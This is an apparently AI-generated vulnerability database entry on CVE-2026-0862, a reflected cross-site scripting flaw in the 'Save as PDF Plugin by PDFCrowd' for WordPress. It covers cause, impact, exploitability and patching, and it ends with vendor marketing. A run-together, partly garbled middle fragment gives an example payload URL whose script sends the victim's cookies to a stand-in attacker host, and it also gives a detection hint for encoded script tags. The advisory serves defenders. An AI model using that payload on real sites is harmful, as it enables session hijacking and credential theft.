
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0862 is a Reflected Cross-Site Scripting (XSS) vulnerability in the "Save as PDF Plugin by PDFCrowd" for WordPress, affecting all versions up to and including 4.5.5. The flaw arises from insufficient input sanitization and output escaping of the options parameter, allowing unauthenticated attackers to inject arbitrary web scripts. Exploitation requires that the PDFCrowd API key is blank ("demo mode," the default installation configuration) or known to the attacker. It was published on January 24, 2026, with Wordfence as the assigning CNA, and carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the reflected type. The options parameter passed to the plugin is not properly sanitized before being rendered in the HTTP response, enabling injection of arbitrary JavaScript. Because the plugin's default installation state leaves the PDFCrowd API key blank (demo mode), the attack surface is broad for newly installed or misconfigured instances. The patch was committed to the WordPress plugin repository at changeset 3438577 (WordPress Trac, Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, phishing page injection, or redirection to malicious sites. The confidentiality and integrity impacts are rated low (limited to browser-context data), and there is no direct availability impact; however, chained with other vulnerabilities, it could facilitate account takeover of authenticated users including administrators (Wordfence, Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-0862 as of the available data. The EPSS score is approximately 0.055%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering — tricking an authenticated user into clicking a crafted link — and is further constrained by the requirement that the API key be blank or known (Wordfence, Red Hat CVE).
options parameter, e.g., https://target-site.com/?pdfcrowd_options=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.options parameter with encoded script tags.<script> tags or JavaScript event handlers in the options parameter (e.g., options=%3Cscript%3E...%3C%2Fscript%3E).Site administrators should update the "Save as PDF Plugin by PDFCrowd" to version 4.5.6 or later, which includes the fix committed in changeset 3438577 (WordPress Trac). As an interim workaround, configuring a valid PDFCrowd API key (exiting demo mode) removes the primary precondition for exploitation. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules can help block crafted requests targeting the options parameter.
Wordfence included CVE-2026-0862 in their weekly WordPress vulnerability report for January 19–25, 2026, noting it as part of a broader set of plugin vulnerabilities disclosed that week (Wordfence Blog). The vulnerability was also tracked by INCIBE-CERT and several vulnerability aggregation platforms shortly after disclosure, indicating routine community monitoring without significant alarm given the medium severity rating (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."